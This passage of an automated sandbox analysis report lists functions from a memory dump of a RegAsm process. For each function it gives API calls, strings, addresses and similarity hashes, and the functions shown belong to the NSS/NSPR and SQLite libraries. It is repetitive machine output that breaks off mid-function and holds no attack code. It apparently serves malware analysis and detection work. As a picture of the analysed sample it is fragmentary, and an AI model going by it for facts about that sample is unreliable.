Function 6C0E6F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

noskipscan*, xrefs: 6C0E7067
sz=[0-9]*, xrefs: 6C0E7049
unordered*, xrefs: 6C0E702B
*?[, xrefs: 6C0E7034, 6C0E7052, 6C0E7070

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 5531c908a8faef251832a40b8165b59c2fbb3fb736832444d54cfc8add7bf499
Instruction ID: c835627441e9429f5ddc7a3dff524a6d28f64be984a723c9777b76f958d31cb7
Opcode Fuzzy Hash: 5531c908a8faef251832a40b8165b59c2fbb3fb736832444d54cfc8add7bf499
Instruction Fuzzy Hash: B8717C32F842154FEB148A6DC88039EB3E29F8D324F650279CD69ABBD2D7719C4687D1

Function 6C17EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C17F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6C17F0F9

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 0b20aa8fbdda41ffa57b925c1069e66a237cb1a13cf126cfe55cb21e6d2759e2
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 1C91A175A0421A8BCB24CF68C8906AFB7F2FF95324F15462DD972A7BC0D734A905CB61

Function 6C1A2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6C1C7929), ref: 6C1A2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6C1C7929), ref: 6C1A2FE0

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: ec4ae15b05a6766b7d4a60944e288c100d3bcfa866b666da0be0589d19c4f462
Instruction ID: 9e87553b648ccf52f46f3b6258ff2dc971714c1ee8b42c13c3eae476c6dc1592
Opcode Fuzzy Hash: ec4ae15b05a6766b7d4a60944e288c100d3bcfa866b666da0be0589d19c4f462
Instruction Fuzzy Hash: 745127B9B04A118FD714CFDAC980B6AB3B1FF45318FA60169D9199BB01C735E847CB80

Function 6C1C0E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C1C1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C1C1086

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: ae529f124db5bc439afb4e1b64ece87a675a91ddeefc0e9dc8d7c61d733b1369
Instruction ID: 174c2dc7d48c89453d2cbff9c8fea9de77777ad33d323c99bad49f73659640e9
Opcode Fuzzy Hash: ae529f124db5bc439afb4e1b64ece87a675a91ddeefc0e9dc8d7c61d733b1369
Instruction Fuzzy Hash: 44A16E71B0125A9FCF08CF99C890AEEBBB6BF58314B158169F904A7700D739ED51CBA1

Function 6C1AED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C1AEE3D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 5b1e5770c1f53a5cc724c06bc0dcf229bdb9441a244571bada3ff55df2eb3b25
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: DA71E2B6E017018FDB18CF99C88076AB7F2EF98304F15466DD85A97B91D734EA12CB90

Function 6C21DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4a5d2ec8d57c49028686cf97af0e733b5b8f819d0bd2172be1354482e2a2e7
Instruction ID: b6664cade29774302b6744de843a53ec250b0ea8c5f2a6b310d2d0e2e329a945
Opcode Fuzzy Hash: 4d4a5d2ec8d57c49028686cf97af0e733b5b8f819d0bd2172be1354482e2a2e7
Instruction Fuzzy Hash: 8EF15D75A04209CFDB09CF19C494BAA77F2BF89318F294168ED099BB41DB35ED42CB91

Function 6C148EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf9a22a650b924192a53038f8c7063d0aba8dd36d8c68f6846c947bd6c37040b
Instruction ID: f55fc517681d7a9409284cc982c360f7164955e94f9e4ec0c2eb0f7e02094b2c
Opcode Fuzzy Hash: cf9a22a650b924192a53038f8c7063d0aba8dd36d8c68f6846c947bd6c37040b
Instruction Fuzzy Hash: 1D11C172A006159BE708DF25D888B5AB3B5FF4231CF0582AAD805DFB81C775E886C7C1

Function 6C220C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa1a6d3c913d12cfb25550cddf697ec24c0863ed44f774c6115954d034a6ec9c
Instruction ID: ef68b6d474f1dddf394f67987fe7b7e0a305343b4e58851f471ffcd7088328ee
Opcode Fuzzy Hash: aa1a6d3c913d12cfb25550cddf697ec24c0863ed44f774c6115954d034a6ec9c
Instruction Fuzzy Hash: C011C1B470430A8FCB04DF18C89466A7BB5FF85368F148069EC198B701DB35E806CBA0

Function 6C220D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 75776d8a5922bbe9101b09d69320f6e35d32d49c3c16491c653bbbf8b3c58abc
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: EBE06D3EA4305DA7DB248E09C460AA97359DF8161AFA48079DC599BE01D637F8038781

Function 6C181D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6C181D46), ref: 6C182345

Strings

CKR_NEXT_OTP, xrefs: 6C18222F
CKR_DEVICE_ERROR, xrefs: 6C18229D
CKR_DEVICE_MEMORY, xrefs: 6C181FF3
CKR_TEMPLATE_INCOMPLETE, xrefs: 6C181F95
CKR_WRAPPED_KEY_LEN_RANGE, xrefs: 6C182319
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6C182015
CKR_SAVED_STATE_INVALID, xrefs: 6C181E56
CKR_PIN_LOCKED, xrefs: 6C182075
CKR_BUFFER_TOO_SMALL, xrefs: 6C182183
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6C182320
CKR_NEW_PIN_MODE, xrefs: 6C181E9F
rv = 0x%x, xrefs: 6C182312
CKR_WRAPPED_KEY_INVALID, xrefs: 6C181FB5
CKR_OK, xrefs: 6C181DFC
CKR_PIN_INVALID, xrefs: 6C182057
CKR_TOKEN_WRITE_PROTECTED, xrefs: 6C181DE0
CKR_MUTEX_BAD, xrefs: 6C181F49
CKR_DEVICE_REMOVED, xrefs: 6C182261
CKR_OPERATION_CANCEL_FAILED, xrefs: 6C181F77
CKR_RANDOM_NO_RNG, xrefs: 6C1822A7
CKR_ENCRYPTED_DATA_LEN_RANGE, xrefs: 6C181F0F
CKR_OBJECT_HANDLE_INVALID, xrefs: 6C18204D
CKR_STATE_UNSAVEABLE, xrefs: 6C182037
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6C181F8B
rv = %s, xrefs: 6C182340
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6C18218D
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6C18226B
CKR_CRYPTOKI_ALREADY_INITIALIZED, xrefs: 6C18227F
CKR_WRAPPING_KEY_TYPE_INCONSISTENT, xrefs: 6C18232E
CKR_OPERATION_ACTIVE, xrefs: 6C1822B8
CKR_PIN_LEN_RANGE, xrefs: 6C182061
CKR_TEMPLATE_INCONSISTENT, xrefs: 6C181EE1
CKR_PIN_INCORRECT, xrefs: 6C181D92
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6C182327
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6C1822FF
CKR_FUNCTION_CANCELED, xrefs: 6C181E73
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6C181FD7
CKR_INFORMATION_SENSITIVE, xrefs: 6C1822B1
CKR_SIGNATURE_LEN_RANGE, xrefs: 6C1820D9
CKR_CRYPTOKI_NOT_INITIALIZED, xrefs: 6C182275
CKR_TOKEN_NOT_PRESENT, xrefs: 6C181F81
CKR_FUNCTION_REJECTED, xrefs: 6C182289
CKR_CURVE_NOT_SUPPORTED, xrefs: 6C182179
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6C182293, 6C18233F
CKR_PIN_EXPIRED, xrefs: 6C18206B
CKR_MUTEX_NOT_LOCKED, xrefs: 6C182225
CKR_SIGNATURE_INVALID, xrefs: 6C1820CF

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print
String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: c3735722bf12933416a14c2f334f07ea33988b6f8853ec1310858892c96c229c
Instruction ID: cb0f5ac3d08ecca42bcd8ac55905727ad3241432d0481274460dd8e8447f8c51
Opcode Fuzzy Hash: c3735722bf12933416a14c2f334f07ea33988b6f8853ec1310858892c96c229c
Instruction Fuzzy Hash: C3610D21A4F148C6E61F460E91BD36CB121AB1B305F61C27FEF958EF95C29CCA854E93

Function 6C141D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C141DA3

Part of subcall function 6C2198D0: calloc.MOZGLUE(00000001,00000084,6C140936,00000001,?,6C14102C), ref: 6C2198E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C141DB2

Part of subcall function 6C141240: TlsGetValue.KERNEL32(00000040,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141267
Part of subcall function 6C141240: EnterCriticalSection.KERNEL32(?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C14127C
Part of subcall function 6C141240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141291
Part of subcall function 6C141240: PR_Unlock.NSS3(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C1412A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C141DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C141E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C141EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C141ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C141EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C141F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C141F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C141F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C141F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C141F83
PR_SetLogFile.NSS3(00000000), ref: 6C141FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C141FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C141FCB
free.MOZGLUE(00000000), ref: 6C141FD2

Strings

Unable to create nspr log file '%s', xrefs: 6C141FB3
timestamp, xrefs: 6C141EC4
all, xrefs: 6C141F0E
sync, xrefs: 6C141E46
append, xrefs: 6C141EE6
NSPR_LOG_FILE, xrefs: 6C141F69
NSPR_LOG_MODULES, xrefs: 6C141DAD
bufsize, xrefs: 6C141E9B
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C141E27
, %n, xrefs: 6C141E6B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: c28a8c517953d8ad61482c3a12154be71de8df7c8aa11498617c19baac662b68
Instruction ID: ddce5315aaac04da7798e85f1f469970be366cb59e008a0a4ccef673daecac51
Opcode Fuzzy Hash: c28a8c517953d8ad61482c3a12154be71de8df7c8aa11498617c19baac662b68
Instruction Fuzzy Hash: 3D51B2B1E042099BDF00DBE5DD48B9E77B8AF11308F288528EC19EBA41E775D568CB91

Function 6C226E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C13F9C9,?,6C13F4DA,6C13F9C9,?,?,6C10369A), ref: 6C0DCA7A
Part of subcall function 6C0DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C0EBE66), ref: 6C226E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C0EBE66), ref: 6C226E98
sqlite3_snprintf.NSS3(?,00000000,6C28AAF9,?,?,?,?,?,?,6C0EBE66), ref: 6C226EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C0EBE66), ref: 6C226ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C0EBE66), ref: 6C226EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C0EBE66), ref: 6C226FA6
sqlite3_snprintf.NSS3(?,00000000,6C28AAF9,00000000,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C226FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C227014
sqlite3_free.NSS3(00000000,?,?,?,?,6C0EBE66), ref: 6C22701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C0EBE66), ref: 6C227030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C0EBE66), ref: 6C22705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C0EBE66), ref: 6C227079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C227097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C0EBE66), ref: 6C2270A0

Strings

winGetTempname1, xrefs: 6C22708F
mz_etilqs_, xrefs: 6C226F18
P&l, xrefs: 6C2270A8
winGetTempname2, xrefs: 6C2270C4
winGetTempname5, xrefs: 6C227071
winGetTempname4, xrefs: 6C227046

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: P&l$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3523104831
Opcode ID: 0e26e1a645ddddc50ba4656a09f7e13d4e825b03bbe996e1943a6473f2da5972
Instruction ID: 335a331b34fcaffd70fb4f0792bd974de856b3b6dfa9a9cf180b5b9c8aa18c68
Opcode Fuzzy Hash: 0e26e1a645ddddc50ba4656a09f7e13d4e825b03bbe996e1943a6473f2da5972
Instruction Fuzzy Hash: CF516A72A0421A5BE71496309CA5FBB36669F92718F144538FC069BFC1FF29B50E82D2

Function 6C188E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C188E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C188EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C188EB3

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C188EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C188EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C188F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C188F29
PR_LogPrint.NSS3(?,00000000), ref: 6C188F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C188F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C188F80
